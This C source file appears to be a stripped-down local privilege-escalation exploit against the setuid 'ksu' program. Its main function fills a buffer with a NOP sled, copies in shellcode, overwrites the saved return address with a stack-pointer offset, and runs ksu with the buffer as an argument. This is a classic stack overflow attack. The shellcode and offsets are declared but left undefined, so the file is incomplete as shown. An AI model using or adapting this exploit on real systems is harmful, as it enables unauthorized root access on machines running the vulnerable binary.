
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CODE_OFFSET ;
 int JMP_OFFSET ;
 int LEN ;
 size_t RET_OFFSET ;
 int execlp (char*,char*,char*,char*,int *) ;
 int get_esp () ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int,int) ;
 int shellcode ;
 int strlen (int ) ;

int main(int argc, char *argv[])
{
  int esp=get_esp();
  int i,j; char b[LEN];

  memset(b,0x90,LEN);
  memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
  *(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
  b[RET_OFFSET+4]=0;

  execlp("ksu","ksu","-n",b,((void*)0));
}
